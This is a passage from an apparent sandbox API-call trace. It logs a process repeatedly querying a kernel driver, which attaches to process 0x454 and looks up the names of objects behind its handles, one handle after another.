lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x116, lpOverlapped=0x0) returned 1 [0144.084] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.085] PsAcquireProcessExitSynchronization () returned 0x0 [0144.085] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.085] ObReferenceObjectByHandle (in: Handle=0x428, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000cac6d0, HandleInformation=0x0) returned 0x0 [0144.085] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.085] PsReleaseProcessExitSynchronization () returned 0x2 [0144.085] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.085] ObQueryNameString (in: Object=0xfffff8a000cac6d0, ObjectNameInfo=0xfffffa8002fa4044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fa4044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.085] ObfDereferenceObject (Object=0xfffff8a000cac6d0) returned 0x2 [0144.085] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.085] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.085] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.085] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xb0, lpOverlapped=0x0) returned 1 [0144.085] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.085] PsAcquireProcessExitSynchronization () returned 0x0 [0144.085] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.085] ObReferenceObjectByHandle (in: Handle=0x430, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0010bbe70, HandleInformation=0x0) returned 0x0 [0144.085] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.085] PsReleaseProcessExitSynchronization () returned 0x2 [0144.086] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.086] ObQueryNameString (in: Object=0xfffff8a0010bbe70, ObjectNameInfo=0xfffffa8002f86044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f86044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.086] ObfDereferenceObject (Object=0xfffff8a0010bbe70) returned 0x7 [0144.086] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.086] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.086] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.086] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xb0, lpOverlapped=0x0) returned 1 [0144.086] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.086] PsAcquireProcessExitSynchronization () returned 0x0 [0144.086] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.086] ObReferenceObjectByHandle (in: Handle=0x438, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0010bbe70, HandleInformation=0x0) returned 0x0 [0144.086] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.086] PsReleaseProcessExitSynchronization () returned 0x2 [0144.086] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.086] ObQueryNameString (in: Object=0xfffff8a0010bbe70, ObjectNameInfo=0xfffffa8002456044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002456044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.086] ObfDereferenceObject (Object=0xfffff8a0010bbe70) returned 0x7 [0144.086] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.086] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.087] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.087] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x116, lpOverlapped=0x0) returned 1 [0144.087] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.087] PsAcquireProcessExitSynchronization () returned 0x0 [0144.087] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.087] ObReferenceObjectByHandle (in: Handle=0x440, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000caa290, HandleInformation=0x0) returned 0x0 [0144.087] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.087] PsReleaseProcessExitSynchronization () returned 0x2 [0144.087] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.087] ObQueryNameString (in: Object=0xfffff8a000caa290, ObjectNameInfo=0xfffffa8002fa0044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fa0044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.087] ObfDereferenceObject (Object=0xfffff8a000caa290) returned 0x2 [0144.087] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.087] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.087] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.087] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xc6, lpOverlapped=0x0) returned 1 [0144.087] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.087] PsAcquireProcessExitSynchronization () returned 0x0 [0144.087] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.088] ObReferenceObjectByHandle (in: Handle=0x44c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037df070, HandleInformation=0x0) returned 0x0 [0144.088] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.088] PsReleaseProcessExitSynchronization () returned 0x2 [0144.088] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.088] ObQueryNameString (in: Object=0xfffffa80037df070, ObjectNameInfo=0xfffffa8002fd7044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd7044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.088] ObfDereferenceObject (Object=0xfffffa80037df070) returned 0x2 [0144.088] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.088] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.088] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.088] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xc6, lpOverlapped=0x0) returned 1 [0144.088] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.088] PsAcquireProcessExitSynchronization () returned 0x0 [0144.088] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.088] ObReferenceObjectByHandle (in: Handle=0x458, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003813070, HandleInformation=0x0) returned 0x0 [0144.088] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.088] PsReleaseProcessExitSynchronization () returned 0x2 [0144.088] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.089] ObQueryNameString (in: Object=0xfffffa8003813070, ObjectNameInfo=0xfffffa8002f21044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f21044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.089] ObfDereferenceObject (Object=0xfffffa8003813070) returned 0x2 [0144.089] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.089] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.089] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.089] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xf8, lpOverlapped=0x0) returned 1 [0144.089] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.089] PsAcquireProcessExitSynchronization () returned 0x0 [0144.089] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.089] ObReferenceObjectByHandle (in: Handle=0x47c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037df760, HandleInformation=0x0) returned 0x0 [0144.089] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.089] PsReleaseProcessExitSynchronization () returned 0x2 [0144.089] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.089] ObQueryNameString (in: Object=0xfffffa80037df760, ObjectNameInfo=0xfffffa8002fc2044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fc2044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.089] ObfDereferenceObject (Object=0xfffffa80037df760) returned 0x2 [0144.089] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.089] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.090] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.090] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x78, lpOverlapped=0x0) returned 1 [0144.090] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.090] PsAcquireProcessExitSynchronization () returned 0x0 [0144.090] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.090] ObReferenceObjectByHandle (in: Handle=0x494, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00117b080, HandleInformation=0x0) returned 0x0 [0144.090] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.090] PsReleaseProcessExitSynchronization () returned 0x2 [0144.090] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.090] ObQueryNameString (in: Object=0xfffff8a00117b080, ObjectNameInfo=0xfffffa8002fc3044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fc3044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.090] ObfDereferenceObject (Object=0xfffff8a00117b080) returned 0x2 [0144.090] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.090] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.090] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.090] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xfa, lpOverlapped=0x0) returned 1 [0144.090] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.090] PsAcquireProcessExitSynchronization () returned 0x0 [0144.090] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.090] ObReferenceObjectByHandle (in: Handle=0x4a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0019676a0, HandleInformation=0x0) returned 0x0 [0144.091] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.091] PsReleaseProcessExitSynchronization () returned 0x2 [0144.091] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.091] ObQueryNameString (in: Object=0xfffff8a0019676a0, ObjectNameInfo=0xfffffa8002fa3044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fa3044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.091] ObfDereferenceObject (Object=0xfffff8a0019676a0) returned 0x2 [0144.091] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.091] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.091] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.091] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xdc, lpOverlapped=0x0) returned 1 [0144.091] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.091] PsAcquireProcessExitSynchronization () returned 0x0 [0144.091] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.091] ObReferenceObjectByHandle (in: Handle=0x4a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80019dabc0, HandleInformation=0x0) returned 0x0 [0144.091] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.091] PsReleaseProcessExitSynchronization () returned 0x2 [0144.091] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.091] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fc4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fc4044, ReturnLength=0xfffff88005163508) returned 0x0 [0144.091] ObfDereferenceObject (Object=0xfffffa80019dabc0) returned 0xe [0144.091] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.091] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.091] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.092] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0144.092] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.092] PsAcquireProcessExitSynchronization () returned 0x0 [0144.092] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.092] ObReferenceObjectByHandle (in: Handle=0x4ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001176770, HandleInformation=0x0) returned 0x0 [0144.092] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.092] PsReleaseProcessExitSynchronization () returned 0x2 [0144.092] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.092] ObQueryNameString (in: Object=0xfffff8a001176770, ObjectNameInfo=0xfffffa80030c7044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030c7044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.092] ObfDereferenceObject (Object=0xfffff8a001176770) returned 0x2 [0144.092] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.092] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.092] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.092] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xb0, lpOverlapped=0x0) returned 1 [0144.092] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.092] PsAcquireProcessExitSynchronization () returned 0x0 [0144.092] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.092] ObReferenceObjectByHandle (in: Handle=0x4e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0010bbe70, HandleInformation=0x0) returned 0x0 [0144.092] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.092] PsReleaseProcessExitSynchronization () returned 0x2 [0144.092] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.093] ObQueryNameString (in: Object=0xfffff8a0010bbe70, ObjectNameInfo=0xfffffa8002fc8044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fc8044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.093] ObfDereferenceObject (Object=0xfffff8a0010bbe70) returned 0x7 [0144.093] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.093] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.093] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.093] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0144.093] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.093] PsAcquireProcessExitSynchronization () returned 0x0 [0144.093] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.093] ObReferenceObjectByHandle (in: Handle=0x4f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80038761d0, HandleInformation=0x0) returned 0x0 [0144.093] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.093] PsReleaseProcessExitSynchronization () returned 0x2 [0144.093] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.093] ObQueryNameString (in: Object=0xfffffa80038761d0, ObjectNameInfo=0xfffffa8002fc5044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fc5044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.093] ObfDereferenceObject (Object=0xfffffa80038761d0) returned 0x2 [0144.093] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.093] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.093] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.093] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0144.093] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.094] PsAcquireProcessExitSynchronization () returned 0x0 [0144.094] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.094] ObReferenceObjectByHandle (in: Handle=0x4fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800385a2d0, HandleInformation=0x0) returned 0x0 [0144.094] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.094] PsReleaseProcessExitSynchronization () returned 0x2 [0144.094] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.094] ObQueryNameString (in: Object=0xfffffa800385a2d0, ObjectNameInfo=0xfffffa8002fa1044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fa1044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.094] ObfDereferenceObject (Object=0xfffffa800385a2d0) returned 0x2 [0144.094] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.094] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.094] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.094] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xc8, lpOverlapped=0x0) returned 1 [0144.094] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.094] PsAcquireProcessExitSynchronization () returned 0x0 [0144.094] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.094] ObReferenceObjectByHandle (in: Handle=0x504, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003873750, HandleInformation=0x0) returned 0x0 [0144.094] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.094] PsReleaseProcessExitSynchronization () returned 0x2 [0144.094] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.094] ObQueryNameString (in: Object=0xfffffa8003873750, ObjectNameInfo=0xfffffa8002fa2044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fa2044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.094] ObfDereferenceObject (Object=0xfffffa8003873750) returned 0x2 [0144.094] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.094] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.095] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.095] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xc8, lpOverlapped=0x0) returned 1 [0144.095] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.095] PsAcquireProcessExitSynchronization () returned 0x0 [0144.095] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.095] ObReferenceObjectByHandle (in: Handle=0x50c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003873600, HandleInformation=0x0) returned 0x0 [0144.095] 